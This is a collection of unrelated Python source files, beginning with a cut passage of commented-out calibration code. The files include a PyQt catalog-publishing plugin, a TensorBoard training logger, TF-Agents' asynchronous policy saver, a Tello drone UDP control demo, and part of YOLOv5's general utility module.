#
# # convert pixel displacement to mm using defined mapping
# dxmm = dxpx / self.pxpercmx
# dymm = dypx / self.pxpercmy
#
# # calculate drive offset. ratio of request/actual
# try:
# self.drive_xratio = rdxmm / dxmm
# self.drive_yratio = rdymm / dymm
# except ZeroDivisionError:
# self.drive_xratio = 100
#
# def _calibration_manager_default(self):
#
# # self.video.open(user = 'calibration')
# return CalibrationManager(parent = self,
# laser_manager = self.parent,
# video_manager = self.video_manager,
# )
# ============= EOF ====================================
# adxs = []
# adys = []
# for p1, p2 in zip(polygons, polygons2):
# # dxs = []
# # dys = []
# # for pts1, pts2 in zip(p1.points, p2.points):
# #
# # dx = pts1.x - pts2.x
# # dy = pts1.y - pts2.y
# # dxs.append(dx)
# # dys.append(dy)
# # dxs = [(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]
# # dys = [(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]
# #
# adx = sum([(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# ady = sum([(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
#
# # adx = sum(dxs) / len(dxs)
# # ady = sum(dys) / len(dys)
# adxs.append(adx)
# adys.append(ady)
# print 'xffset', sum(adxs) / len(adxs)
# print 'yffset', sum(adys) / len(adys)
|
__init__.py
|
from PyQt4 import QtCore, QtGui
from pluginmgr import Tool
import multiprocessing
import queue
import sys, os
class Plugin(Tool):
_proc = None
_action = None
def action(self):
if self._action is None:
self._action = QtGui.QAction("Publish Catalog", None)
self._action.setCheckable(True)
self._action.triggered.connect(self.publish)
return self._action
def check_url (self):
publisher = __import__('publisher')
try:
data = publisher.queue.get(False)
if data is not None:
if 'url' in data:
QtGui.QMessageBox.information(None, \
'Catalog published', \
'You can access your catalog on: %s'%data['url'], \
QtGui.QMessageBox.Ok, \
QtGui.QMessageBox.NoButton, \
QtGui.QMessageBox.NoButton)
elif 'error' in data:
print(("Error publishing catalog: %s"%data['error']))
QtGui.QMessageBox.critical(self, \
'Failed to publish catalog', \
'An error ocurred while trying to publish your catalog.')
self.timer.stop()
except queue.Empty:
pass
def publish(self, checked):
print(("Publish: ", checked))
if not checked and self._proc:
print("Stopping OPDS server")
self._proc.terminate()
self._proc = None
return
if not self._proc:
dirname = os.path.join(
os.path.abspath(
os.path.dirname(__file__)))
sys.path.append(dirname)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.check_url)
self.timer.start(1000)
publisher = __import__('publisher')
self._proc = multiprocessing.Process(target = publisher.real_publish)
self._proc.daemon = True
self._proc.start()
|
model_logging.py
|
import tensorflow as tf
import numpy as np
import scipy.misc
import threading
try:
from StringIO import StringIO # Python 2.7
except ImportError:
from io import BytesIO # Python 3.x
class Logger:
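# Periodically prints the training loss, runs validation, and (optionally) kicks off
# sample generation on a background thread at the configured step intervals.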
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None):
self.trainer = trainer
self.log_interval = log_interval
self.validation_interval = validation_interval
self.generate_interval = generate_interval
self.accumulated_loss = 0
self.generate_function = generate_function
if self.generate_function is not None:
self.generate_thread = threading.Thread(target=self.generate_function)
self.generate_thread.daemon = True  # daemonize so a pending generation never blocks interpreter exit
def log(self, current_step, current_loss):
self.accumulated_loss += current_loss
if current_step % self.log_interval == 0:
self.log_loss(current_step)
self.accumulated_loss = 0
if current_step % self.validation_interval == 0:
self.validate(current_step)
if current_step % self.generate_interval == 0:
self.generate(current_step)
def log_loss(self, current_step):
avg_loss = self.accumulated_loss / self.log_interval
print("loss at step " + str(current_step) + ": " + str(avg_loss))
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
print("validation loss: " + str(avg_loss))
print("validation accuracy: " + str(avg_accuracy * 100) + "%")
def generate(self, current_step):
if self.generate_function is None:
return
if self.generate_thread.is_alive():
print("Last generate is still running, skipping this one")
else:
self.generate_thread = threading.Thread(target=self.generate_function,
args=[current_step])
self.generate_thread.daemon = True
self.generate_thread.start()
# Code referenced from https://gist.github.com/gyglim/1f8dfb1b5c82627ae3efcfbbadb9f514
class TensorboardLogger(Logger):
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None,
log_dir='logs'):
super().__init__(log_interval, validation_interval, generate_interval, trainer, generate_function)
self.writer = tf.summary.create_file_writer(log_dir)
def log_loss(self, current_step):
# loss
avg_loss = self.accumulated_loss / self.log_interval
with self.writer.as_default():
tf.summary.scalar('loss', avg_loss, step=current_step)
# parameter histograms
for tag, value in self.trainer.model.named_parameters():
tag = tag.replace('.', '/')
tf.summary.histogram(tag, value.data.cpu().numpy(), step=current_step, buckets=200)
if value.grad is not None:
tf.summary.histogram(tag + '/grad', value.grad.data.cpu().numpy(), step=current_step, buckets=200)
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
with self.writer.as_default():
tf.summary.scalar('validation loss', avg_loss, step=current_step)
tf.summary.scalar('validation accuracy', avg_accuracy, step=current_step)
|
async_policy_saver.py
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Async helper for the policy saver."""
import threading
from typing import Text
from absl import logging
from tf_agents.policies import policy_saver as policy_saver_module
class AsyncPolicySaver(object):
"""Triggers `policy_saver` save calls in a separate thread asynchronously."""
def __init__(self, policy_saver: policy_saver_module.PolicySaver):
"""Initialize an AsyncPolicySaver.
Args:
policy_saver: An instance of a `policy_saver.PolicySaver`.
"""
self._policy_saver = policy_saver
self._save_condition_variable = threading.Condition()
# These vars should only be accessed if the lock in save_condition is held.
# export_dir is set to None whenever there is no pending save. Otherwise it
# is used to communicate across threads.
self._export_dir = None
self._saving_checkpoint = False
self._join_save_thread = False
self._save_thread = threading.Thread(target=self._save_loop)
self._save_thread.start()
def _save_loop(self):
"""Helper method for the saving thread to wait and execute save requests."""
while True:
with self._save_condition_variable:
while not self._export_dir:
self._save_condition_variable.wait()
if self._join_save_thread:
return
if self._saving_checkpoint:
logging.info("Saving checkpoint to %s", self._export_dir)
self._policy_saver.save_checkpoint(self._export_dir)
else:
logging.info("Saving policy to %s", self._export_dir)
self._policy_saver.save(self._export_dir)
self._export_dir = None
self._save_condition_variable.notify()
def _assert_save_thread_is_alive(self):
if self._join_save_thread or not self._save_thread.is_alive():
raise ValueError("Saving thread in AsyncPolicySaver is not alive. Either "
"an exception has occured while saving, or the saver "
"was closed.")
def save(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy to the given `export_dir`.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the `saved_model` of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=False, blocking=blocking)
def save_checkpoint(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy checkpoint.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the checkpoint of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=True, blocking=blocking)
def _save(self, export_dir, saving_checkpoint, blocking):
"""Helper save method, generalizes over save and save_checkpoint."""
self._assert_save_thread_is_alive()
if blocking:
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
if saving_checkpoint:
self._policy_saver.save_checkpoint(export_dir)
else:
self._policy_saver.save(export_dir)
return
if not self._save_condition_variable.acquire(blocking=False):
logging.info("AsyncPolicySaver save is still in progress skipping save.")
return
try:
self._saving_checkpoint = saving_checkpoint
self._export_dir = export_dir
self._save_condition_variable.notify()
finally:
self._save_condition_variable.release()
def flush(self):
"""Blocks until there is no saving happening."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
def close(self):
"""Blocks until there is no saving happening and kills the save_thread."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
self._join_save_thread = True
self._save_condition_variable.notify()
self._save_thread.join()
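# Example usage (a minimal sketch; `my_policy_saver` stands in for an existing
# policy_saver.PolicySaver instance):
#   saver = AsyncPolicySaver(my_policy_saver)
#   saver.save('/tmp/policy')  # returns immediately; the save runs on the background thread
#   saver.flush()              # block until the pending save has finished
#   saver.close()              # drain pending work and stop the background thread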
|
Tello3.py
|
#
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
import threading
import socket
import sys
import time
from datetime import datetime
host = ''
port = 9000
locaddr = (host,port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
count = 0
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print ('\n', datetime.now(), ' - Exit . . .\n')
break
print ('\r\n\r\n', datetime.now(), ' - Tello Python3 Demo.\r\n')
print (datetime.now(), ' - Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print (datetime.now(), '- end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
dateTimeObj = datetime.now()
while True:
try:
msg = input("");
if not msg:
break
if 'end' in msg:
print (datetime.now(), ' - ...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
print(datetime.now(), " - command sent to Tello: ", msg)
except KeyboardInterrupt:
print ('\n', datetime.now(), ' - . . .\n')
sock.close()
break
|
general.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
General utils
"""
import contextlib
import glob
import inspect
import logging
import math
import os
import platform
import random
import re
import shutil
import signal
import threading
import time
import urllib
from datetime import datetime
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from subprocess import check_output
from typing import Optional
from zipfile import ZipFile
import cv2
import numpy as np
import pandas as pd
import pkg_resources as pkg
import torch
import torchvision
import yaml
from utils.downloads import gsutil_getsize
from utils.metrics import box_iou, fitness
FILE = Path(__file__).resolve()
ROOT = FILE.parents[1] # YOLOv5 root directory
RANK = int(os.getenv('RANK', -1))
# Settings
DATASETS_DIR = ROOT.parent / 'datasets' # YOLOv5 datasets directory
NUM_THREADS = min(8, max(1, os.cpu_count() - 1)) # number of YOLOv5 multiprocessing threads
AUTOINSTALL = str(os.getenv('YOLOv5_AUTOINSTALL', True)).lower() == 'true' # global auto-install mode
VERBOSE = str(os.getenv('YOLOv5_VERBOSE', True)).lower() == 'true' # global verbose mode
FONT = 'Arial.ttf' # https://ultralytics.com/assets/Arial.ttf
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
pd.options.display.max_columns = 10
cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
os.environ['NUMEXPR_MAX_THREADS'] = str(NUM_THREADS) # NumExpr max threads
os.environ['OMP_NUM_THREADS'] = str(NUM_THREADS) # OpenMP max threads (PyTorch and SciPy)
def is_kaggle():
# Is environment a Kaggle Notebook?
try:
assert os.environ.get('PWD') == '/kaggle/working'
assert os.environ.get('KAGGLE_URL_BASE') == 'https://www.kaggle.com'
return True
except AssertionError:
return False
def is_writeable(dir, test=False):
# Return True if directory has write permissions, test opening a file with write permissions if test=True
if not test:
return os.access(dir, os.R_OK) # possible issues on Windows
file = Path(dir) / 'tmp.txt'
try:
with open(file, 'w'): # open file with write permissions
pass
file.unlink() # remove file
return True
except OSError:
return False
def set_logging(name=None, verbose=VERBOSE):
# Sets level and returns logger
if is_kaggle():
for h in logging.root.handlers:
logging.root.removeHandler(h) # remove all handlers associated with the root logger object
rank = int(os.getenv('RANK', -1)) # rank in world for Multi-GPU trainings
level = logging.INFO if verbose and rank in {-1, 0} else logging.WARNING
log = logging.getLogger(name)
log.setLevel(level)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(message)s"))
handler.setLevel(level)
log.addHandler(handler)
set_logging() # run before defining LOGGER
LOGGER = logging.getLogger("yolov5") # define globally (used in train.py, val.py, detect.py, etc.)
def user_config_dir(dir='Ultralytics', env_var='YOLOV5_CONFIG_DIR'):
# Return path of user configuration directory. Prefer environment variable if exists. Make dir if required.
env = os.getenv(env_var)
if env:
path = Path(env) # use environment variable
else:
cfg = {'Windows': 'AppData/Roaming', 'Linux': '.config', 'Darwin': 'Library/Application Support'} # 3 OS dirs
path = Path.home() / cfg.get(platform.system(), '') # OS-specific config dir
path = (path if is_writeable(path) else Path('/tmp')) / dir # GCP and AWS lambda fix, only /tmp is writeable
path.mkdir(exist_ok=True) # make if required
return path
CONFIG_DIR = user_config_dir() # Ultralytics settings dir
class Profile(contextlib.ContextDecorator):
# Usage: @Profile() decorator or 'with Profile():' context manager
def __enter__(self):
self.start = time.time()
def __exit__(self, type, value, traceback):
print(f'Profile results: {time.time() - self.start:.5f}s')
class Timeout(contextlib.ContextDecorator):
# Usage: @Timeout(seconds) decorator or 'with Timeout(seconds):' context manager
def __init__(self, seconds, *, timeout_msg='', suppress_timeout_errors=True):
self.seconds = int(seconds)
self.timeout_message = timeout_msg
self.suppress = bool(suppress_timeout_errors)
def _timeout_handler(self, signum, frame):
raise TimeoutError(self.timeout_message)
def __enter__(self):
if platform.system() != 'Windows': # not supported on Windows
signal.signal(signal.SIGALRM, self._timeout_handler) # Set handler for SIGALRM
signal.alarm(self.seconds) # start countdown for SIGALRM to be raised
def __exit__(self, exc_type, exc_val, exc_tb):
if platform.system() != 'Windows':
signal.alarm(0) # Cancel SIGALRM if it's scheduled
if self.suppress and exc_type is TimeoutError: # Suppress TimeoutError
return True
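# Illustrative usage sketch (not part of the original module): bounding a slow call with the
# Timeout context manager defined above. 'slow_download' is a hypothetical placeholder function.
#
#   with Timeout(5, timeout_msg='download timed out'):
#       slow_download()  # interrupted by SIGALRM after 5 s (no-op on Windows)
#   # execution continues here; the TimeoutError is suppressed by default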
class WorkingDirectory(contextlib.ContextDecorator):
# Usage: @WorkingDirectory(dir) decorator or 'with WorkingDirectory(dir):' context manager
def __init__(self, new_dir):
self.dir = new_dir # new dir
self.cwd = Path.cwd().resolve() # current dir
def __enter__(self):
os.chdir(self.dir)
def __exit__(self, exc_type, exc_val, exc_tb):
os.chdir(self.cwd)
def try_except(func):
# try-except function. Usage: @try_except decorator
def handler(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
print(e)
return handler
def threaded(func):
# Multi-threads a target function and returns thread. Usage: @threaded decorator
def wrapper(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
thread.start()
return thread
return wrapper
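# Illustrative usage sketch (not part of the original module): @threaded runs each call of the
# decorated function in a daemon thread and returns the Thread object instead of the result.
# 'upload_results' is a hypothetical placeholder.
#
#   @threaded
#   def upload_results(path):
#       pass  # long-running I/O
#
#   t = upload_results('results.csv')  # returns immediately
#   t.join()                           # optionally wait for completion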
def methods(instance):
# Get class/instance methods
return [f for f in dir(instance) if callable(getattr(instance, f)) and not f.startswith("__")]
def print_args(args: Optional[dict] = None, show_file=True, show_fcn=False):
# Print function arguments (optional args dict)
x = inspect.currentframe().f_back # previous frame
file, _, fcn, _, _ = inspect.getframeinfo(x)
if args is None: # get args automatically
args, _, _, frm = inspect.getargvalues(x)
args = {k: v for k, v in frm.items() if k in args}
s = (f'{Path(file).stem}: ' if show_file else '') + (f'{fcn}: ' if show_fcn else '')
LOGGER.info(colorstr(s) + ', '.join(f'{k}={v}' for k, v in args.items()))
def init_seeds(seed=0):
# Initialize random number generator (RNG) seeds https://pytorch.org/docs/stable/notes/randomness.html
# cudnn seed 0 settings are slower and more reproducible, else faster and less reproducible
import torch.backends.cudnn as cudnn
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
cudnn.benchmark, cudnn.deterministic = (False, True) if seed == 0 else (True, False)
def intersect_dicts(da, db, exclude=()):
# Dictionary intersection of matching keys and shapes, omitting 'exclude' keys, using da values
return {k: v for k, v in da.items() if k in db and not any(x in k for x in exclude) and v.shape == db[k].shape}
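# Illustrative usage sketch (assumption, not from the original module): intersect_dicts() is
# typically used when loading checkpoint weights into a model whose head differs, keeping only
# entries whose key and shape match. 'ckpt' and 'model' are hypothetical placeholders.
#
#   csd = ckpt['model'].float().state_dict()
#   csd = intersect_dicts(csd, model.state_dict(), exclude=['anchor'])
#   model.load_state_dict(csd, strict=False)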
def get_latest_run(search_dir='.'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def is_docker():
# Is environment a Docker container?
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def is_colab():
# Is environment a Google Colab instance?
try:
import google.colab
return True
except ImportError:
return False
def is_pip():
# Is file in a pip package?
return 'site-packages' in Path(__file__).resolve().parts
def is_ascii(s=''):
# Is string composed of all ASCII (no UTF) characters? (note str().isascii() introduced in python 3.7)
s = str(s) # convert list, tuple, None, etc. to str
return len(s.encode().decode('ascii', 'ignore')) == len(s)
def is_chinese(s='人工智能'):
# Is string composed of any Chinese characters?
return bool(re.search('[\u4e00-\u9fff]', str(s)))
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def file_age(path=__file__):
# Return days since last file update
dt = (datetime.now() - datetime.fromtimestamp(Path(path).stat().st_mtime)) # delta
return dt.days # + dt.seconds / 86400 # fractional days
def file_date(path=__file__):
# Return human-readable file modification date, i.e. '2021-3-26'
t = datetime.fromtimestamp(Path(path).stat().st_mtime)
return f'{t.year}-{t.month}-{t.day}'
def file_size(path):
# Return file/dir size (MB)
mb = 1 << 20 # bytes to MiB (1024 ** 2)
path = Path(path)
if path.is_file():
return path.stat().st_size / mb
elif path.is_dir():
return sum(f.stat().st_size for f in path.glob('**/*') if f.is_file()) / mb
else:
return 0.0
def check_online():
# Check internet connectivity
import socket
try:
socket.create_connection(("1.1.1.1", 443), 5) # check host accessibility
return True
except OSError:
return False
def git_describe(path=ROOT): # path must be a directory
# Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe
try:
assert (Path(path) / '.git').is_dir()
return check_output(f'git -C {path} describe --tags --long --always', shell=True).decode()[:-1]
except Exception:
return ''
@try_except
@WorkingDirectory(ROOT)
def check_git_status():
# Recommend 'git pull' if code is out of date
msg = ', for updates see https://github.com/ultralytics/yolov5'
s = colorstr('github: ') # string
assert Path('.git').exists(), s + 'skipping check (not a git repository)' + msg
assert not is_docker(), s + 'skipping check (Docker image)' + msg
assert check_online(), s + 'skipping check (offline)' + msg
cmd = 'git fetch && git config --get remote.origin.url'
url = check_output(cmd, shell=True, timeout=5).decode().strip().rstrip('.git') # git fetch
branch = check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out
n = int(check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind
if n > 0:
s += f"⚠️ YOLOv5 is out of date by {n} commit{'s' * (n > 1)}. Use `git pull` or `git clone {url}` to update."
else:
s += f'up to date with {url} ✅'
LOGGER.info(emojis(s)) # emoji-safe
def check_python(minimum='3.7.0'):
# Check current python version vs. required python version
check_version(platform.python_version(), minimum, name='Python ', hard=True)
def check_version(current='0.0.0', minimum='0.0.0', name='version ', pinned=False, hard=False, verbose=False):
# Check version vs. required version
current, minimum = (pkg.parse_version(x) for x in (current, minimum))
result = (current == minimum) if pinned else (current >= minimum) # bool
s = f'{name}{minimum} required by YOLOv5, but {name}{current} is currently installed' # string
if hard:
assert result, s # assert min requirements met
if verbose and not result:
LOGGER.warning(s)
return result
@try_except
def check_requirements(requirements=ROOT / 'requirements.txt', exclude=(), install=True, cmds=()):
# Check installed dependencies meet requirements (pass *.txt file or list of packages)
prefix = colorstr('red', 'bold', 'requirements:')
check_python() # check python version
if isinstance(requirements, (str, Path)): # requirements.txt file
file = Path(requirements)
assert file.exists(), f"{prefix} {file.resolve()} not found, check failed."
with file.open() as f:
requirements = [f'{x.name}{x.specifier}' for x in pkg.parse_requirements(f) if x.name not in exclude]
else: # list or tuple of packages
requirements = [x for x in requirements if x not in exclude]
n = 0 # number of packages updates
for i, r in enumerate(requirements):
try:
pkg.require(r)
except Exception: # DistributionNotFound or VersionConflict if requirements not met
s = f"{prefix} {r} not found and is required by YOLOv5"
if install and AUTOINSTALL: # check environment variable
LOGGER.info(f"{s}, attempting auto-update...")
try:
assert check_online(), f"'pip install {r}' skipped (offline)"
LOGGER.info(check_output(f'pip install "{r}" {cmds[i] if cmds else ""}', shell=True).decode())
n += 1
except Exception as e:
LOGGER.warning(f'{prefix} {e}')
else:
LOGGER.info(f'{s}. Please install and rerun your command.')
if n: # if packages updated
source = file.resolve() if 'file' in locals() else requirements
s = f"{prefix} {n} package{'s' * (n > 1)} updated per {source}\n" \
f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
LOGGER.info(emojis(s))
def check_img_size(imgsz, s=32, floor=0):
# Verify image size is a multiple of stride s in each dimension
if isinstance(imgsz, int): # integer i.e. img_size=640
new_size = max(make_divisible(imgsz, int(s)), floor)
else: # list i.e. img_size=[640, 480]
imgsz = list(imgsz) # convert to list if tuple
new_size = [max(make_divisible(x, int(s)), floor) for x in imgsz]
if new_size != imgsz:
LOGGER.warning(f'WARNING: --img-size {imgsz} must be multiple of max stride {s}, updating to {new_size}')
return new_size
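# Examples (illustrative): with the default stride s=32, sizes are rounded up to the next
# multiple of the stride (a warning is logged when the value changes).
#
#   check_img_size(640)          # -> 640
#   check_img_size(641)          # -> 672
#   check_img_size([640, 481])   # -> [640, 512]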
def check_imshow():
# Check if environment supports image displays
try:
assert not is_docker(), 'cv2.imshow() is disabled in Docker environments'
assert not is_colab(), 'cv2.imshow() is disabled in Google Colab environments'
cv2.imshow('test', np.zeros((1, 1, 3)))
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return True
except Exception as e:
LOGGER.warning(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}')
return False
def check_suffix(file='yolov5s.pt', suffix=('.pt',), msg=''):
# Check file(s) for acceptable suffix
if file and suffix:
if isinstance(suffix, str):
suffix = [suffix]
for f in file if isinstance(file, (list, tuple)) else [file]:
s = Path(f).suffix.lower() # file suffix
if len(s):
assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}"
def check_yaml(file, suffix=('.yaml', '.yml')):
# Search/download YAML file (if necessary) and return path, checking suffix
return check_file(file, suffix)
def check_file(file, suffix=''):
# Search/download file (if necessary) and return path
check_suffix(file, suffix) # optional
file = str(file) # convert to str()
if Path(file).is_file() or not file: # exists
return file
elif file.startswith(('http:/', 'https:/')): # download
url = file # warning: Pathlib turns :// -> :/
file = Path(urllib.parse.unquote(file).split('?')[0]).name # '%2F' to '/', split https://url.com/file.txt?auth
if Path(file).is_file():
LOGGER.info(f'Found {url} locally at {file}') # file already exists
else:
LOGGER.info(f'Downloading {url} to {file}...')
torch.hub.download_url_to_file(url, file)
assert Path(file).exists() and Path(file).stat().st_size > 0, f'File download failed: {url}' # check
return file
else: # search
files = []
for d in 'data', 'models', 'utils': # search directories
files.extend(glob.glob(str(ROOT / d / '**' / file), recursive=True)) # find file
assert len(files), f'File not found: {file}' # assert file was found
assert len(files) == 1, f"Multiple files match '{file}', specify exact path: {files}" # assert unique
return files[0] # return file
def check_font(font=FONT, progress=False):
# Download font to CONFIG_DIR if necessary
font = Path(font)
file = CONFIG_DIR / font.name
if not font.exists() and not file.exists():
url = "https://ultralytics.com/assets/" + font.name
LOGGER.info(f'Downloading {url} to {file}...')
torch.hub.download_url_to_file(url, str(file), progress=progress)
def check_dataset(data, autodownload=True):
# Download and/or unzip dataset if not found locally
# Usage: https://github.com/ultralytics/yolov5/releases/download/v1.0/coco128_with_yaml.zip
# Download (optional)
extract_dir = ''
if isinstance(data, (str, Path)) and str(data).endswith('.zip'): # i.e. gs://bucket/dir/coco128.zip
download(data, dir=DATASETS_DIR, unzip=True, delete=False, curl=False, threads=1)
data = next((DATASETS_DIR / Path(data).stem).rglob('*.yaml'))
extract_dir, autodownload = data.parent, False
# Read yaml (optional)
if isinstance(data, (str, Path)):
with open(data, errors='ignore') as f:
data = yaml.safe_load(f) # dictionary
# Resolve paths
path = Path(extract_dir or data.get('path') or '') # optional 'path' default to '.'
if not path.is_absolute():
path = (ROOT / path).resolve()
for k in 'train', 'val', 'test':
if data.get(k): # prepend path
data[k] = str(path / data[k]) if isinstance(data[k], str) else [str(path / x) for x in data[k]]
# Parse yaml
assert 'nc' in data, "Dataset 'nc' key missing."
if 'names' not in data:
data['names'] = [f'class{i}' for i in range(data['nc'])] # assign class names if missing
train, val, test, s = (data.get(x) for x in ('train', 'val', 'test', 'download'))
if val:
val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path
if not all(x.exists() for x in val):
LOGGER.info(emojis('\nDataset not found ⚠, missing paths %s' % [str(x) for x in val if not x.exists()]))
if not s or not autodownload:
raise Exception(emojis('Dataset not found ❌'))
t = time.time()
root = path.parent if 'path' in data else '..' # unzip directory i.e. '../'
if s.startswith('http') and s.endswith('.zip'): # URL
f = Path(s).name # filename
LOGGER.info(f'Downloading {s} to {f}...')
torch.hub.download_url_to_file(s, f)
Path(root).mkdir(parents=True, exist_ok=True) # create root
ZipFile(f).extractall(path=root) # unzip
Path(f).unlink() # remove zip
r = None # success
elif s.startswith('bash '): # bash script
LOGGER.info(f'Running {s} ...')
r = os.system(s)
else: # python script
r = exec(s, {'yaml': data}) # return None
dt = f'({round(time.time() - t, 1)}s)'
s = f"success ✅ {dt}, saved to {colorstr('bold', root)}" if r in (0, None) else f"failure {dt} ❌"
LOGGER.info(emojis(f"Dataset download {s}"))
check_font('Arial.ttf' if is_ascii(data['names']) else 'Arial.Unicode.ttf', progress=True) # download fonts
return data # dictionary
def check_amp(model):
# Check PyTorch Automatic Mixed Precision (AMP) functionality. Return True on correct operation
from models.common import AutoShape, DetectMultiBackend
def amp_allclose(model, im):
# All close FP32 vs AMP results
m = AutoShape(model, verbose=False) # model
a = m(im).xywhn[0] # FP32 inference
m.amp = True
b = m(im).xywhn[0] # AMP inference
return a.shape == b.shape and torch.allclose(a, b, atol=0.1) # close to 10% absolute tolerance
prefix = colorstr('AMP: ')
device = next(model.parameters()).device # get model device
if device.type == 'cpu':
return False # AMP disabled on CPU
f = ROOT / 'data' / 'images' / 'bus.jpg' # image to check
im = f if f.exists() else 'https://ultralytics.com/images/bus.jpg' if check_online() else np.ones((640, 640, 3))
try:
assert amp_allclose(model, im) or amp_allclose(DetectMultiBackend('yolov5n.pt', device), im)
LOGGER.info(emojis(f'{prefix}checks passed ✅'))
return True
except Exception:
help_url = 'https://github.com/ultralytics/yolov5/issues/7908'
LOGGER.warning(emojis(f'{prefix}checks failed ❌, disabling Automatic Mixed Precision. See {help_url}'))
return False
def url2file(url):
# Convert URL to filename, i.e. https://url.com/file.txt?auth -> file.txt
url = str(Path(url)).replace(':/', '://') # Pathlib turns :// -> :/
return Path(urllib.parse.unquote(url)).name.split('?')[0] # '%2F' to '/', split https://url.com/file.txt?auth
def download(url, dir='.', unzip=True, delete=True, curl=False, threads=1, retry=3):
# Multi-threaded file download and unzip function, used in data.yaml for autodownload
def download_one(url, dir):
# Download 1 file
success = True
f = dir / Path(url).name # filename
if Path(url).is_file(): # exists in current path
Path(url).rename(f) # move to dir
elif not f.exists():
LOGGER.info(f'Downloading {url} to {f}...')
for i in range(retry + 1):
if curl:
s = 'sS' if threads > 1 else '' # silent
r = os.system(f'curl -{s}L "{url}" -o "{f}" --retry 9 -C -') # curl download with retry, continue
success = r == 0
else:
torch.hub.download_url_to_file(url, f, progress=threads == 1) # torch download
success = f.is_file()
if success:
break
elif i < retry:
LOGGER.warning(f'Download failure, retrying {i + 1}/{retry} {url}...')
else:
LOGGER.warning(f'Failed to download {url}...')
if unzip and success and f.suffix in ('.zip', '.gz'):
LOGGER.info(f'Unzipping {f}...')
if f.suffix == '.zip':
ZipFile(f).extractall(path=dir) # unzip
elif f.suffix == '.gz':
os.system(f'tar xfz {f} --directory {f.parent}') # unzip
if delete:
f.unlink() # remove zip
dir = Path(dir)
dir.mkdir(parents=True, exist_ok=True) # make directory
if threads > 1:
pool = ThreadPool(threads)
pool.imap(lambda x: download_one(*x), zip(url, repeat(dir))) # multi-threaded
pool.close()
pool.join()
else:
for u in [url] if isinstance(url, (str, Path)) else url:
download_one(u, dir)
def make_divisible(x, divisor):
# Returns nearest x divisible by divisor
if isinstance(divisor, torch.Tensor):
divisor = int(divisor.max()) # to int
return math.ceil(x / divisor) * divisor
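# Examples (illustrative): make_divisible() rounds up to the nearest multiple of 'divisor',
# e.g. when scaling layer channel counts.
#
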